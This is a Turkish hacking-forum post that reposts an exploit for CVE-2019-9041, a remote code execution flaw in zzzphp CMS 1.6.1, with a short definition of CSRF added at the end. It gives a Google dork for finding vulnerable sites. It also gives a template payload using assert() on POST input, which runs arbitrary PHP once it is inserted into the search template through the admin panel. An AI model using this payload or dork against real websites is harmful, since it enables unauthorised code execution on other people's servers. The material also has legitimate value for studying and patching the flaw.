İPUCU

Exploitler Exploit Nedir ? Nasıl Kullanılır Ve Yeni Çıkan Exploitler Hakkında Bilgi ...

Seçenekler

zzzphp CMS 1.6.1 - Remote Code Execution

26-02-2019 17:45
#1
Ludas - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Nereden:
Ludas.py
Yaş:
19
Mesajlar:
216
Teşekkür (Etti):
27
Teşekkür (Aldı):
39
Konular:
28
Ticaret:
(0) %
# Exploit başlığı : dynamic code evaluation of zzzphp cms 1.6.1

# Google Dork : intext:"2015-2019 zzcms.com"

# Tarih : 24/02/2019

# Exploit yazarı : Yang Chenglong

# Yayıncı sayfası : http://www.zzzcms.com/index.html

# Yazılım link : http://115.29.55.18/zzzphp.zip

# Version : 1.6.1

# Test : Windows/Linux,iis/apache

# CVE : CVE-2019-9041


inc/zzz_template.php içindeki parserIfLabel() başarısızlık dolayısı ile filtreleme fonksiyonundan saldırganlar şablon dosyasına dinamik php kodu ekleyebilir.

Exploit : yönetici paneline giriş yapın, arama şablonunu düzenleyin.html, aşağıdaki kodu ekleyin:





{if:assert($_POST[x])}phpinfo();{end if}



Visit the http://webroot/search/ and post data “x = phpinfo();”, the page will execute the php code “phpinfo()” as follow: [1.png]



Belirtilen : Verilen exploit, saldırganların yönetici paneline erişmesini gerektirirken, yönetici paneline erişmeden web sitesinin kontrolünü elde etmek için csrf kullanarak başka bir exploit yayınlayacağım. (Yang Chenglong)

--------------------------------------------------------------


Csrf nedir diyenler için ufak bir tanım :
XSRF ya da CSRF, websitelerini hedef alan kötü niyetli bir exploit türüdür. XSRF ile websitesinin güvendiği bir kullanıcı üzerinden, websitesine izin verilmeyen ya da kullanıcının farkında olmadığı komutlar gönderilir. https://tr.wikipedia.org
/wiki/XSRF



Exploit : https://www.exploit-db.com/exploits/46454
Kullanıcı İmzası

|~ Yalnızlık olsun istediğin, uzaya mahkum ederim. ~|

Telegram ⋟ @Ludas_THT

|~ Vaktimiz doldu, artık gözlerin kapalı. ~|
Kacamax, Keh4n3t Teşekkür etti.


Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı